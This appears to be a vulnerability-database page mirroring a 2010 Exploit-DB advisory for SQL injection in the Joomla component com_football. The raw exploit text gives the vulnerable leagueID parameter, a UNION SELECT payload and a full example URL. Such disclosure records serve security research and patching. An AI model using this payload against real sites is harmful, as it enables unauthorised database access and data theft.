Joomla Component com_football SQL Injection Vulnerability

vendor:

com_football

by:

DevilZ TM

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: com_football

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component com_football SQL Injection Vulnerability

A SQL injection vulnerability exists in the Joomla component com_football. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable application in order to gain access to the underlying database. The vulnerable parameter is the ‘leagueID’ parameter which is not properly sanitized before being used in a SQL query. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application in order to gain access to the underlying database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Title : Joomla Component com_football SQL Injection Vulnerability
# Author: DevilZ TM
# Data  : 2010-04-02

[~]######################################### InformatioN #############################################[~]
 
[~] Title     : Joomla Component com_football SQL Injection Vulnerability
[~] Author    : DevilZ TM By D3v1l
[~] Homepage  : http://www.DEVILZTM.com
[~] Email     : Expl0it@DevilZTM.Com
[~] Contact   : D3v1l.blackhat@yahoo.com
 
[~]#########################################   ExploiT   #############################################[~]
 
[~] Vulnerable File :
 
http://127.0.0.1/index.php?option=com_football&task=viewteams&leagueID=[SQL]
 
[~] ExploiT         :
 
-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--
 
[~] Example         :
 
http://127.0.0.1/index.php?option=com_football&task=viewteams&leagueID=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--

  
[~]######################################### ThankS To ... ############################################[~]
 
[~] Special Thanks To My Best FriendS :
 
Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
 
[~] IRANIAN Young HackerZ
 
[~] GreetZ : Exploit-DB TeaM

[~]#########################################   FinisH :D   #############################################[~]